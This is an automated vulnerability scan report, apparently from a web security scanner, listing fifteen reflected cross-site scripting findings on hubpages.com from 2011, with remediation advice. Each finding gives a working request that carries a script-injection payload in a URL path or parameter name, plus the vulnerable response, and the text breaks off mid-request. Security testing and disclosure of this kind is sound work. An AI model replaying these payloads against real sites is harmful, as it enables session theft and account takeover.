XSS, Cross Site Scripting, CWE-79, hubpages.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://hubpages.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 548f8"><script>alert(1)</script>9a7d90ba46e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?548f8"><script>alert(1)</script>9a7d90ba46e=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:15:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 29252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/?548f8"><script>alert(1)</script>9a7d90ba46e=1', 'HubPages'); return false;">
...[SNIP]...

1.2. http://hubpages.com/about/advertise [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/about/advertise

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23253"><script>alert(1)</script>b500e541fe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about23253"><script>alert(1)</script>b500e541fe8/advertise HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about23253"><script>alert(1)</script>b500e541fe8/advertise', 'Page not found'); return false;">
...[SNIP]...

1.3. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/about/advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40c6c"><script>alert(1)</script>7545254ff79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 9876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/about/advertise?40c6c"><script>alert(1)</script>7545254ff79=1', 'Advertise on HubPages'); return false;">
...[SNIP]...

1.4. http://hubpages.com/hubs/hot/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/hubs/hot/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8bd"><script>alert(1)</script>8ae6a13056a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad8bd"><script>alert(1)</script>8ae6a13056a/hot/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:40 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/ad8bd"><script>alert(1)</script>8ae6a13056a/hot/', 'Page not found'); return false;">
...[SNIP]...

1.5. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/hubs/hot/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd29"><script>alert(1)</script>a7b16cce6e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:39 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Hot Hubs" href="http://hubpages.com/hubs/hot/?9cd29"><script>alert(1)</script>a7b16cce6e7=1&rss" />
...[SNIP]...

1.6. http://hubpages.com/my/hubs/stats [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/my/hubs/stats

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42fda"><script>alert(1)</script>dcab9466b78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:08 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my42fda"><script>alert(1)</script>dcab9466b78/hubs/stats', 'Page not found'); return false;">
...[SNIP]...

1.7. http://hubpages.com/my/hubs/stats [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/my/hubs/stats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bf69"><script>alert(1)</script>92d7c54b2f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:18 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats', 'Page not found'); return false;">
...[SNIP]...

1.8. http://hubpages.com/my/hubs/stats [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/my/hubs/stats

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 277b5"><script>alert(1)</script>f325d2bc4d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:28 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8', 'Page not found'); return false;">
...[SNIP]...

1.9. http://hubpages.com/signin/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>e576f82391c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

1.10. http://hubpages.com/topics/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/topics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f48"><script>alert(1)</script>a4d9d607aff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics99f48"><script>alert(1)</script>a4d9d607aff/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics99f48"><script>alert(1)</script>a4d9d607aff/', 'Page not found'); return false;">
...[SNIP]...

1.11. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/topics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fdc"><script>alert(1)</script>33eb76fcea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:36 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 66444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1', 'Popular Topics on HubPages'); return false;">
...[SNIP]...

1.12. http://hubpages.com/tour/affiliate [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/tour/affiliate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a6d1"><script>alert(1)</script>cc37e02719e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate', 'Page not found'); return false;">
...[SNIP]...

1.13. http://hubpages.com/tour/affiliate [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/tour/affiliate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6a5"><script>alert(1)</script>b63f5c1a6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:58 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd', 'HubPages Tour: not found'); return false;">
...[SNIP]...

1.14. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/tour/affiliate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afa9"><script>alert(1)</script>d4f4f14b999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 11829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1', 'HubPages Affiliate Tour'); return false;">
...[SNIP]...

1.15. http://hubpages.com/user/new/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hubpages.com
Path:	/user/new/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f280"><script>alert(1)</script>1667bd96a88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user8f280"><script>alert(1)</script>1667bd96a88/new/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
